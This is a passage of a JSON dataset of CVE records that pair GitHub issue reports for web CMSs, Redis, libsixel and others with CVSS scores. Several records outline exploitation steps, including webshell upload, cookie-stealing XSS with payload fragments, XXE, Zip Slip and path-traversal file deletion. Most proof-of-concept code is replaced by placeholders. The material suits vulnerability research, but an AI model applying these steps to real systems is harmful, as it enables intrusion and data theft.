        "Issue_Created_At": "2019-10-22T13:56:49Z",
        "description": "Remote command execution vulnerability exists in the management backend. In the \"\"\u8d85\u7ea7\u63a7\u5236\u53f0 >\u6a21\u677f >\u6a21\u677f\u7ba1\u7406\"\", Add function can bypass suffix whitelist verification, and upload any file. Like this. FILETAG Then click Save. FILETAG File FILETAG will be successfully created and written to malicious content. Then go to FILETAG to get the webshell. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21362",
        "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/78",
        "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/78",
        "Repo_new": "magicblack/maccms10",
        "Issue_Created_At": "2019-10-22T12:56:42Z",
        "description": "XSS vulnerability exists in the background search function.. When the administrator logged in, open the following link. APITAG FILETAG Can take over the administrator because the value of the cookie is obtained",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-21363",
        "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/79",
        "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/79",
        "Repo_new": "magicblack/maccms10",
        "Issue_Created_At": "2019-10-22T13:17:51Z",
        "description": "Any file can be deleted in the background. In the \"\"\u8d85\u7ea7\u63a7\u5236\u53f0 >\u57fa\u7840 >\u9644\u4ef6\u7ba1\u7406\"\", delete function can delete any file, including APITAG After the administrator logged in, open the following link. APITAG File APITAG will be deleted Then visit APITAG This can reinstall the entire site. FILETAG delete APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.2,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-21386",
        "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/126",
        "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/126",
        "Repo_new": "magicblack/maccms10",
        "Issue_Created_At": "2019-11-25T09:32:04Z",
        "description": "There is a CSRF vulnerability and XSS vulnerability via PATHTAG that can get the administrator's privileges. After the administrator logged in, open the following page,which will add a classification. APITAG add a classification. Insert payload in the \u201ctype_en\u201d. CODETAG Then, the \u201cenglish name\u201d will be modified to \" APITAG \". We can see the result. FILETAG The attacker can use this vulnerability to obtain the administrator's cookie. Then he will get the administrator's privileges!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21431",
        "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/14",
        "Issue_Url_new": "https://github.com/neeke/hongcms/issues/14",
        "Repo_new": "neeke/hongcms",
        "Issue_Created_At": "2019-11-28T08:35:27Z",
        "description": "APITAG NUMBERTAG Arbitrary Files Read and Edit in template/edit APITAG Privilege). APITAG to the backstage as the administrator; APITAG need to access the page\" URLTAG \" FILETAG APITAG the file name you want to edit or read in the URL and access this page. For example: \" FILETAG \". FILETAG APITAG can see that FILETAG has been read and edited.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.2,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-21468",
        "Issue_Url_old": "https://github.com/antirez/redis/issues/6633",
        "Issue_Url_new": "https://github.com/redis/redis/issues/6633",
        "Repo_new": "redis/redis",
        "Issue_Created_At": "2019-12-01T01:48:53Z",
        "description": "Unexpected crash. === REDIS BUG REPORT START: Cut & paste starting from here NUMBERTAG M NUMBERTAG No NUMBERTAG Redis APITAG crashed by signal NUMBERTAG M NUMBERTAG No NUMBERTAG Crashed running the instruction at NUMBERTAG d4daa NUMBERTAG e NUMBERTAG M NUMBERTAG No NUMBERTAG Accessing address: (nil NUMBERTAG M NUMBERTAG No NUMBERTAG Failed assertion: <no assertion failed> (<no file NUMBERTAG STACK TRACE EIP: PATHTAG APITAG Backtrace: PATHTAG APITAG PATHTAG APITAG PATHTAG NUMBERTAG fc NUMBERTAG e0f NUMBERTAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG INFO OUTPUT Server APITAG redis_git_sha1:a1b NUMBERTAG redis_git_dirty NUMBERTAG APITAG redis_mode:standalone APITAG NUMBERTAG generic NUMBERTAG arch_bits NUMBERTAG multiplexing_api:epoll atomicvar_api:atomic builtin gcc_version NUMBERTAG process_id NUMBERTAG APITAG tcp_port NUMBERTAG uptime_in_seconds NUMBERTAG uptime_in_days NUMBERTAG hz NUMBERTAG configured_hz NUMBERTAG lru_clock NUMBERTAG PATHTAG config_file: Clients connected_clients NUMBERTAG APITAG APITAG blocked_clients NUMBERTAG tracking_clients NUMBERTAG Memory used_memory NUMBERTAG used_memory_human NUMBERTAG K used_memory_rss NUMBERTAG used_memory_rss_human NUMBERTAG M used_memory_peak NUMBERTAG APITAG used_memory_peak_perc NUMBERTAG used_memory_overhead NUMBERTAG used_memory_startup NUMBERTAG APITAG APITAG allocator_allocated NUMBERTAG allocator_active NUMBERTAG allocator_resident NUMBERTAG APITAG APITAG used_memory_lua NUMBERTAG used_memory_lua_human NUMBERTAG K used_memory_scripts NUMBERTAG used_memory_scripts_human NUMBERTAG B number_of_cached_scripts NUMBERTAG maxmemory NUMBERTAG maxmemory_human NUMBERTAG B maxmemory_policy:noeviction allocator_frag_ratio NUMBERTAG allocator_frag_bytes NUMBERTAG allocator_rss_ratio NUMBERTAG allocator_rss_bytes NUMBERTAG rss_overhead_ratio NUMBERTAG rss_overhead_bytes NUMBERTAG mem_fragmentation_ratio NUMBERTAG APITAG mem_not_counted_for_evict NUMBERTAG mem_replication_backlog NUMBERTAG mem_clients_slaves NUMBERTAG mem_clients_normal NUMBERTAG mem_aof_buffer NUMBERTAG mem_allocator:jemalloc NUMBERTAG active_defrag_running NUMBERTAG lazyfree_pending_objects NUMBERTAG Persistence loading NUMBERTAG rdb_changes_since_last_save NUMBERTAG rdb_bgsave_in_progress NUMBERTAG rdb_last_save_time NUMBERTAG rdb_last_bgsave_status:ok rdb_last_bgsave_time_sec NUMBERTAG rdb_current_bgsave_time_sec NUMBERTAG rdb_last_cow_size NUMBERTAG aof_enabled NUMBERTAG aof_rewrite_in_progress NUMBERTAG aof_rewrite_scheduled NUMBERTAG aof_last_rewrite_time_sec NUMBERTAG aof_current_rewrite_time_sec NUMBERTAG aof_last_bgrewrite_status:ok aof_last_write_status:ok aof_last_cow_size NUMBERTAG module_fork_in_progress NUMBERTAG module_fork_last_cow_size NUMBERTAG Stats APITAG total_commands_processed NUMBERTAG instantaneous_ops_per_sec NUMBERTAG total_net_input_bytes NUMBERTAG total_net_output_bytes NUMBERTAG instantaneous_input_kbps NUMBERTAG APITAG rejected_connections NUMBERTAG sync_full NUMBERTAG sync_partial_ok NUMBERTAG sync_partial_err NUMBERTAG expired_keys NUMBERTAG expired_stale_perc NUMBERTAG APITAG APITAG evicted_keys NUMBERTAG keyspace_hits NUMBERTAG keyspace_misses NUMBERTAG pubsub_channels NUMBERTAG pubsub_patterns NUMBERTAG latest_fork_usec NUMBERTAG migrate_cached_sockets NUMBERTAG slave_expires_tracked_keys NUMBERTAG active_defrag_hits NUMBERTAG active_defrag_misses NUMBERTAG active_defrag_key_hits NUMBERTAG active_defrag_key_misses NUMBERTAG tracking_used_slots NUMBERTAG Replication role:master connected_slaves NUMBERTAG APITAG APITAG master_repl_offset NUMBERTAG second_repl_offset NUMBERTAG repl_backlog_active NUMBERTAG repl_backlog_size NUMBERTAG APITAG repl_backlog_histlen NUMBERTAG CPU APITAG APITAG APITAG APITAG Modules Commandstats APITAG Cluster cluster_enabled NUMBERTAG Keyspace APITAG CLIENT LIST OUTPUT REGISTERS NUMBERTAG M NUMBERTAG No NUMBERTAG RA NUMBERTAG RB NUMBERTAG fc NUMBERTAG d NUMBERTAG RC NUMBERTAG d4daaa NUMBERTAG c0 RD NUMBERTAG d4dacfdb NUMBERTAG RDI NUMBERTAG fc NUMBERTAG eca NUMBERTAG RSI NUMBERTAG RBP NUMBERTAG fc NUMBERTAG eca NUMBERTAG RSP NUMBERTAG fff5c0d1c NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG eb R NUMBERTAG eb R NUMBERTAG R NUMBERTAG d4dacfa NUMBERTAG R NUMBERTAG fff5c0d1dac R NUMBERTAG RIP NUMBERTAG d4daa NUMBERTAG e9 EFL NUMBERTAG CSGSFS NUMBERTAG b NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5f NUMBERTAG c NUMBERTAG fde NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5e NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5d NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5c NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5b NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5a NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG e NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG e NUMBERTAG e NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG d4da NUMBERTAG c6f NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG fff5c0d1dac NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG d4dacfa NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG fff5c0d1c NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG fc NUMBERTAG d NUMBERTAG c NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG fc NUMBERTAG d NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG c NUMBERTAG fde NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG d4dacfa NUMBERTAG MODULES INFO OUTPUT FAST MEMORY TEST NUMBERTAG M NUMBERTAG No NUMBERTAG Bio thread for job type NUMBERTAG terminated NUMBERTAG M NUMBERTAG No NUMBERTAG Bio thread for job type NUMBERTAG terminated NUMBERTAG M NUMBERTAG No NUMBERTAG Bio thread for job type NUMBERTAG terminated Preparing to test memory region NUMBERTAG d4dace NUMBERTAG bytes) Preparing to test memory region NUMBERTAG d4db8e NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG aa2c NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG b NUMBERTAG d NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG ba2e NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG c NUMBERTAG f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG d NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG e0da NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG e2f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG eca NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG ecd NUMBERTAG bytes) .O.O.O.O.O.O.O.O.O.O.O Fast memory test PASSED, however your memory can still be broken. Please run a memory test for several hours if possible. DUMPING CODE AROUND EIP Symbol: je_large_dalloc (base NUMBERTAG d4daa NUMBERTAG c0) Module: PATHTAG NUMBERTAG base NUMBERTAG d4da NUMBERTAG d r p /tmp/dump.hex /tmp/dump.bin $ objdump adjust vma NUMBERTAG d4daa NUMBERTAG c0 D b binary m i NUMBERTAG tmp/dump.bin NUMBERTAG M NUMBERTAG No NUMBERTAG dump of function (hexdump of NUMBERTAG bytes): APITAG Function at NUMBERTAG d4daa NUMBERTAG f0 is APITAG Function at NUMBERTAG d4daa NUMBERTAG f NUMBERTAG is je_arena_extents_dirty_dalloc === REDIS BUG REPORT END. Make sure to include from START to END. === version information ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21493",
        "Issue_Url_old": "https://github.com/wanghaiwei/xiuno-docker/issues/3",
        "Issue_Url_new": "https://github.com/rayfalling/xiuno-docker/issues/3",
        "Repo_new": "rayfalling/xiuno-docker",
        "Issue_Created_At": "2019-12-05T15:07:20Z",
        "description": "User Name Enumeration Vulnerability. FILETAG line NUMBERTAG CODETAG Know the username by traversing the login parameter value email=...& POC: CODETAG Response CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21494",
        "Issue_Url_old": "https://github.com/wanghaiwei/xiuno-docker/issues/4",
        "Issue_Url_new": "https://github.com/rayfalling/xiuno-docker/issues/4",
        "Repo_new": "rayfalling/xiuno-docker",
        "Issue_Created_At": "2019-12-07T00:18:13Z",
        "description": "Storage Cross Site Scripting Attack (XSS) Vulnerability. URL\uff1a FILETAG FILETAG line NUMBERTAG CODETAG FILETAG line NUMBERTAG ERRORTAG FILETAG line NUMBERTAG CODETAG FILETAG line NUMBERTAG APITAG The doctype defaults to NUMBERTAG The data packet is modified to APITAG xss payload can be triggered. POC: CODETAG FILETAG FILETAG FILETAG \u5b58\u50a8\u8de8\u7ad9\u811a\u672c\u653b\u51fb\uff08XSS\uff09\u6f0f\u6d1e URL\uff1a FILETAG FILETAG NUMBERTAG CODETAG FILETAG NUMBERTAG ERRORTAG FILETAG NUMBERTAG CODETAG FILETAG NUMBERTAG APITAG doctype NUMBERTAG APITAG payload. POC: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21495",
        "Issue_Url_old": "https://github.com/wanghaiwei/xiuno-docker/issues/5",
        "Issue_Url_new": "https://github.com/rayfalling/xiuno-docker/issues/5",
        "Repo_new": "rayfalling/xiuno-docker",
        "Issue_Created_At": "2019-12-07T01:01:39Z",
        "description": "Storage Cross Site Scripting Attack (XSS) Vulnerability . /admin/?setting base.htm sitename sitebrief PATHTAG line NUMBERTAG APITAG PATHTAG line NUMBERTAG ERRORTAG FILETAG line NUMBERTAG APITAG PATHTAG line NUMBERTAG ERRORTAG FILETAG line NUMBERTAG APITAG FILETAG line NUMBERTAG CODETAG poc: ERRORTAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21503",
        "Issue_Url_old": "https://github.com/caokang/waimai/issues/15",
        "Issue_Url_new": "https://github.com/caokang/waimai/issues/15",
        "Repo_new": "caokang/waimai",
        "Issue_Created_At": "2019-12-07T18:45:05Z",
        "description": "This is a payment logic vulnerability that can modify the value of payment. First of all, we choose to use points to exchange products. for example you want to exchange this product, you need to use NUMBERTAG points FILETAG FILETAG Then we can get the request package. FILETAG We changed the value of the parameter credit to NUMBERTAG FILETAG FILETAG We've managed to get this product for free. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21504",
        "Issue_Url_old": "https://github.com/caokang/waimai/issues/16",
        "Issue_Url_new": "https://github.com/caokang/waimai/issues/16",
        "Repo_new": "caokang/waimai",
        "Issue_Created_At": "2019-12-08T09:45:05Z",
        "description": "Three XSS vulnerabilities found in Waimai Super Cms. In waimai Super Cms master, there is an XSS vulnerability via the APITAG and PATHTAG Referer parameter, APITAG page parameter NUMBERTAG Payload: Referer: '\"> APITAG APITAG alert NUMBERTAG APITAG FILETAG FILETAG FILETAG NUMBERTAG Payload: Referer: '\"> APITAG APITAG alert NUMBERTAG APITAG FILETAG FILETAG FILETAG NUMBERTAG Payload: POST APITAG HTTP NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG Trident NUMBERTAG r NUMBERTAG like Gecko Referer: URLTAG Cookie: APITAG Connection: keep alive Host: localhost Content Length NUMBERTAG Accept: / Accept Language: en US,en;q NUMBERTAG Content Type: application/x www form urlencoded FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21522",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/418",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/418",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-12-11T10:35:33Z",
        "description": "A Zip Slip Directory Traversal Vulnerability in the backend. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG Then start an http service and use the installation theme feature to start the installation CODETAG Then you can see that our file FILETAG is decompressed to the / tmp directory. FILETAG Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21524",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/423",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/423",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-12-11T11:44:59Z",
        "description": "A XML external entity (XXE) vulnerability in the backend. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG So there is a XML external entity (XXE) APITAG vulnerability can detect the intranet, read files, ddos attacks, etc. Demonstrate reading files First construct an evil xml file. When the file is parsed, read the APITAG file and put the result into the category list field. FILETAG ERRORTAG Upload this file to the system and get the file path APITAG Using the imported wordpress blog information interface to trigger a vulnerability ERRORTAG After sending the above message, you can see the contents of the APITAG file in the background classification directory. FILETAG Bug fix recommendations: APITAG (\" URLTAG \", true) ; CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21525",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/420",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/420",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-12-11T10:52:58Z",
        "description": "An Arbitrary File reading in the backend(bypass the Path check). APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG So I can read any file using the following message FILETAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21526",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/421",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/421",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-12-11T11:00:30Z",
        "description": "An Arbitrary file writing vulnerability in the backend. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21527",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/422",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/422",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-12-11T11:06:14Z",
        "description": "An Arbitrary file deletion vulnerability in the backend. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply [x] BUG feedback There is a backup function in the background. When we delete our backup files, we can delete any files on the system through directory traversal. CODETAG My backup file directory is at APITAG . The above message can delete the FILETAG file in the APITAG directory",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.7,
        "impactScore": 4.0,
        "exploitabilityScore": 3.1
    },
    {
        "CVE_ID": "CVE-2020-21547",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/114",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/114",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-13T13:53:59Z",
        "description": "heap buffer overflow in dither_func_fs at APITAG version : img2sixel NUMBERTAG There is a heap buffer overflow in dither_func_fs at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21548",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/116",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/116",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-16T04:32:36Z",
        "description": "heap buffer overflow in sixel_encode_highcolor at APITAG img2sixel NUMBERTAG There is a heap buffer overflow in sixel_encode_highcolor at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21564",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/91",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/91",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2019-12-19T15:37:06Z",
        "description": "Pluck NUMBERTAG admin background exists a remote command execution vulnerability when uploading files. Pluck NUMBERTAG admin background exists a remote command execution vulnerability when uploading files Proof step1: login > pages > manage files upload .htaccess file to turn APITAG to FILETAG FILETAG step2: throw FILETAG into trash FILETAG step3: upload shell code FILETAG ERRORTAG FILETAG step4: view FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21564",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/83",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/83",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2019-10-21T09:08:10Z",
        "description": "Pluck NUMBERTAG de NUMBERTAG admin background exists a remote command execution vulnerability in the management file interface.. Upload these two files in the management file interface. FILETAG Access in FILETAG . FILETAG Successful execution. Then upload attack code. FILETAG FILETAG Successfully obtained the shell. Poc\uff1a APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21572",
        "Issue_Url_old": "https://github.com/trgil/gilcc/issues/1",
        "Issue_Url_new": "https://github.com/trgil/gilcc/issues/1",
        "Repo_new": "trgil/gilcc",
        "Issue_Created_At": "2019-12-22T10:54:02Z",
        "description": "out of bounds array access and bufferoverflow. hi, I find out of bounds array access and bufferoverflow in APITAG :) FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21573",
        "Issue_Url_old": "https://github.com/abhijitnathwani/image-processing/issues/3",
        "Issue_Url_new": "https://github.com/abhijitnathwani/image-processing/issues/3",
        "Repo_new": "abhijitnathwani/image-processing",
        "Issue_Created_At": "2019-12-23T07:55:31Z",
        "description": "Stack exhuasted. hi, I only modified the input image file and cause stack exhausted. I think variable _buffer_ should not be defined as a local variable, but should be dynamically applied for heap space. :) FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-21574",
        "Issue_Url_old": "https://github.com/YotsuyaNight/c-http/issues/1",
        "Issue_Url_new": "https://github.com/yotsuyanight/c-http/issues/1",
        "Repo_new": "YotsuyaNight/c-http",
        "Issue_Created_At": "2019-12-24T03:22:05Z",
        "description": "Buffer Overflow. Hi APITAG I am interesting in this repo, and I test the main.c with a long requrest such as( APITAG ) APITAG and serve crashed because of the buffer overflow in APITAG : CODETAG Do you have a solution for this bug? Thanks :)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21585",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/54",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/54",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2019-12-24T02:25:06Z",
        "description": "emlog NUMBERTAG zip template getshell vulnerability. APITAG Vulnerability in PATHTAG line NUMBERTAG function APITAG $path, $type = 'tpl') { if APITAG FALSE)) { return NUMBERTAG zip = new APITAG if ( APITAG >open($zipfile) !== TRUE) { return NUMBERTAG r = explode('/', $zip APITAG NUMBERTAG dir = isset($r NUMBERTAG r NUMBERTAG switch ($type) { case 'tpl': $re = $zip APITAG . APITAG if (false === $re) return NUMBERTAG break; case 'plugin': $plugin_name = substr($dir NUMBERTAG re = $zip APITAG . $plugin_name . '.php'); //We can upload a zipfile and extract a php webshell later if (false === $re) return NUMBERTAG break; case 'backup': $sql_name = substr($dir NUMBERTAG if APITAG != 'sql') return NUMBERTAG break; case 'update': break; } if (true === APITAG APITAG { $zip APITAG return NUMBERTAG else { return NUMBERTAG POC: FILETAG We upload FILETAG which contains FILETAG Then we access FILETAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21588",
        "Issue_Url_old": "https://github.com/lonely-explorer/CoreFTP/issues/1",
        "Issue_Url_new": "https://github.com/lonely-explorer/coreftp/issues/1",
        "Repo_new": "lonely-explorer/CoreFTP",
        "Issue_Created_At": "2020-02-26T13:55:40Z",
        "description": "Core FTP Local DOS Vulnerability. Vulnerability in Core FTP allows a local attacker to cause the server crash. Core FTP LE ver NUMBERTAG APITAG on Windows NUMBERTAG Step APITAG python code: APITAG Step APITAG the content in FILETAG , and paste it in Setup APITAG APITAG editbox. Step APITAG OK button, which results in a crash and the server closes.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-21590",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/190",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/190",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2020-03-15T04:29:26Z",
